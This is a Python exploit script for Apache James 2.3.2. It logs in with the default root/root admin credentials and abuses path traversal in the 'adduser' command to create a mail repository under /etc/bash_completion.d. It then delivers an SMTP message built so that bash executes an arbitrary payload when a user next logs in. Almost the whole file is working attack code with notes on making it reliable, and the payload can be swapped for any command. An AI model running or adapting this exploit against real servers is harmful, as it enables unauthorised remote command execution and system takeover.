exploit.py

"""An exploit for Apache James 2.3.2 that executes remote commands.

This script targets Apache James deployments that still use the stock
configuration: the remote administration tool on port 4555 accepting the
default root/root credentials, and an SMTP listener on port 25.  It relies
on the admin tool's "adduser" command not sanitising the user name, so a
name containing "../" makes James create the new user's mail repository
under an arbitrary path -- here /etc/bash_completion.d (see the write-up
linked below).  A mail sent to that user is then stored as a file in that
directory, and bash sources it the next time a user logs in, which runs the
payload.

Things to know before running it:

  * Writing into /etc/bash_completion.d requires James itself to run with
    write access to that directory (typically as root).  Nothing here
    checks that; the exploit just fails silently otherwise.
  * The payload runs with the privileges of whichever user next logs in and
    sources bash completion -- not with James's privileges.  That is why
    the conditional form below only touches /root when that user is root.
  * The exploit leaves a new James user and the dropped file behind; clean
    them up after a test.

The default payload is "touch /tmp/proof.txt".  To prove root execution
instead, use:

    [ "$(id -u)" == "0" ] && touch /root/proof.txt

For more details, see: https://www.exploit-db.com/exploits/35513/.
"""
  14.  
  15. import gflags
  16. import socket
  17. import sys
  18. import time
  19.  
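FLAGS = gflags.FLAGS

# Command-line flags.  Defaults match a stock James 2.3.2 install.  The port
# flags are declared with integer defaults and a valid port range so gflags
# rejects nonsense early instead of coercing a string at parse time.
#
# NOTE: the payload is dropped verbatim into a file that bash will source,
# one line at a time; keep it to a single line with no CR/LF.
gflags.DEFINE_string(
    'payload', 'touch /tmp/proof.txt', 'The payload to execute.')
gflags.DEFINE_string(
    'host', '127.0.0.1', 'The host address of the Apache James deployment.')
gflags.DEFINE_integer(
    'admin_port', 4555, 'The port number of the administration tool.',
    lower_bound=1, upper_bound=65535)
gflags.DEFINE_integer(
    'smtp_port', 25, 'The port number of the SMTP server.',
    lower_bound=1, upper_bound=65535)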
  29.  
# Credentials for the James remote administration tool.  These are the
# stock defaults; the exploit only works if the target never changed them,
# because CreateNewSmtpUser needs an authenticated admin session to run
# "adduser".
ADMIN_USER = 'root'
ADMIN_PASSWORD = 'root'

# The number of bytes to receive from the admin and SMTP servers.  A single
# recv() of this size is assumed to cover one server reply; nothing below
# loops on partial reads or parses the reply.
RECV_BYTES = 1024

# The number of seconds to sleep after receiving data from the SMTP server.
# Replies are never inspected, so this delay is the only thing keeping the
# next command from being sent before James has processed the previous one.
SLEEP_SEC = 0.2
  39.  
  40.  
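def ConnectToAdminServer(timeout=10.0):
    """Connects to the James remote administration tool and logs in.

    The tool sends a login prompt, then a password prompt; the stock
    ADMIN_USER/ADMIN_PASSWORD pair is answered to each.  The prompts and the
    login result are read but not inspected, so a rejected login is not
    detected here -- the caller's next command (adduser) just fails on the
    server side.

    Args:
      timeout: Socket timeout in seconds, so an unresponsive host cannot
        hang the script indefinitely.  None disables the timeout.

    Returns:
      An open, authenticated socket to the administration server.

    Raises:
      socket.error (including socket.timeout): if connecting or the login
        exchange fails.  The socket is closed before the error propagates.
    """
    s = socket.create_connection((FLAGS.host, FLAGS.admin_port), timeout)
    try:
        s.recv(RECV_BYTES)  # login prompt
        # sendall rather than send: send() may write only part of the buffer.
        s.sendall((ADMIN_USER + '\n').encode('ascii'))
        s.recv(RECV_BYTES)  # password prompt
        s.sendall((ADMIN_PASSWORD + '\n').encode('ascii'))
        s.recv(RECV_BYTES)  # login result -- not checked (see docstring)
    except socket.error:
        s.close()
        raise
    return s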
  56.  
  57.  
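def ConnectToSmtpServer(timeout=10.0):
    """Connects to the SMTP server and opens a session with EHLO.

    The server's 220 greeting is consumed before EHLO is sent, so that each
    later RecvAndSleep() reads the reply to the command sent just before it.
    Sending EHLO first and reading only once can leave the greeting and the
    EHLO reply out of step with the commands that follow.

    Args:
      timeout: Socket timeout in seconds; None disables the timeout.

    Returns:
      An open socket to the SMTP server, positioned after the EHLO reply.

    Raises:
      socket.error (including socket.timeout): if connecting or the
        greeting/EHLO exchange fails.  The socket is closed before the error
        propagates.
    """
    s = socket.create_connection((FLAGS.host, FLAGS.smtp_port), timeout)
    try:
        RecvAndSleep(s)  # 220 greeting
        s.sendall(b'ehlo team@team.pl\r\n')
        RecvAndSleep(s)  # 250 reply (multi-line, read as one chunk)
    except socket.error:
        s.close()
        raise
    return s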
  70.  
  71.  
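def CreateNewSmtpUser(s):
    """Creates the James user whose mail repository lands in /etc/bash_completion.d.

    This is the path-traversal half of the exploit: "adduser" on James 2.3.2
    does not sanitise the user name, so the "../" sequences make James create
    the user's mail directory under /etc/bash_completion.d instead of under
    its own data directory (see the exploit-db write-up in the module
    docstring).  SendSmtpPayload() later delivers a message to this user,
    which James stores as a file in that directory.  The password "exploit"
    is arbitrary; nothing ever logs in as this user.

    Args:
      s: An open, authenticated socket to the administration tool, as
        returned by ConnectToAdminServer().  It is closed on return, even if
        sending fails.

    Returns:
      The raw reply to the adduser command (bytes), so callers can inspect it
      for success.  No check is done here because the exact success text is
      not pinned down in this script.
    """
    try:
        s.sendall(b'adduser ../../../../../../../../etc/bash_completion.d exploit\n')
        reply = s.recv(RECV_BYTES)
        s.sendall(b'quit\n')
    finally:
        s.close()
    return reply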
  83.  
  84.  
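def RecvAndSleep(s):
    """Reads one chunk of reply from a socket, then pauses briefly.

    The pause (SLEEP_SEC) is the only pacing in the SMTP exchange: replies
    are never parsed, so the delay gives James time to finish processing a
    command before the next one is sent.

    Args:
      s: An open socket.

    Returns:
      The bytes received (at most RECV_BYTES).  An empty value means the
      peer closed the connection.  Callers that want to verify an SMTP
      reply code can look at the first three characters.
    """
    data = s.recv(RECV_BYTES)
    time.sleep(SLEEP_SEC)
    return data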
  94.  
  95.  
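def SendSmtpPayload(s):
    """Delivers the payload to the traversal user as an SMTP message.

    James stores the message, headers included, as a file under
    /etc/bash_completion.d, and bash sources that file at the next login.
    The message is shaped so that bash treats the headers as inert:

      * The single quote in the MAIL FROM address is expected to be echoed
        into the stored headers (Return-Path), opening a shell
        single-quoted string.
      * The lone "'" line sent after the blank line closes that string, so
        everything up to it is one quoted word that bash ignores.
      * The next line is the payload, which bash then executes.

    The "'" line and the payload line are terminated with a bare LF on
    purpose: a CR there would land in the file and become part of the
    command bash runs.  For the same reason FLAGS.payload must be a single
    line; an embedded newline is not escaped here.

    Replies are read with RecvAndSleep() but not inspected, so a rejected
    RCPT or DATA is not detected; the exchange simply runs to completion.

    Args:
      s: An open socket to the SMTP server, past the EHLO reply, as returned
        by ConnectToSmtpServer().  It is closed on return, even if sending
        fails.
    """
    payload = FLAGS.payload
    if not isinstance(payload, bytes):
        payload = payload.encode('utf-8')  # str on Python 3; already bytes on 2
    # Headers, blank line, then the body bash will see (see docstring).
    message = b''.join([
        b'From: team@team.pl\r\n',
        b'\r\n',
        b'\'\n',
        payload + b'\n',
        b'\r\n.\r\n',
    ])
    try:
        s.sendall(b'mail from: <\'@team.pl>\r\n')
        RecvAndSleep(s)
        # Also try: ../../../../../../../../etc/bash_completion.d@hostname>\r\n
        s.sendall(b'rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n')
        RecvAndSleep(s)
        s.sendall(b'data\r\n')
        RecvAndSleep(s)
        s.sendall(message)
        RecvAndSleep(s)
        s.sendall(b'quit\r\n')
        RecvAndSleep(s)
    finally:
        s.close()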
  119.  
  120.  
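def Main(argv):
  """Parses flags, then runs the two halves of the exploit in order.

  Step 1 logs in to the admin tool and creates the traversal user; step 2
  delivers the payload over SMTP.  Step 2 without step 1 would most likely
  be rejected, so any error in step 1 aborts the run.

  Args:
    argv: sys.argv, including the program name; parsed by gflags.

  Exits:
    -1 on a flag error (usage is printed); 1 on a socket error.
  """
  try:
    argv = FLAGS(argv)
  except gflags.FlagsError as e:
    # "except ... as" and print() are valid on both Python 2 and 3; the
    # Python-2-only forms were a syntax error on 3.
    print('%s\nUsage: %s ARGS\n%s' % (e, sys.argv[0], FLAGS))
    sys.exit(-1)

  try:
    CreateNewSmtpUser(ConnectToAdminServer())
    SendSmtpPayload(ConnectToSmtpServer())
  except socket.error as e:
    # Refused, reset or timed out: report it instead of dumping a traceback,
    # since "target not listening" is the common failure.
    print('Socket error talking to %s: %s' % (FLAGS.host, e))
    sys.exit(1)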
  130.  
  131.  
if __name__ == '__main__':
  Main(sys.argv)  # gflags parses the flags out of argv inside Main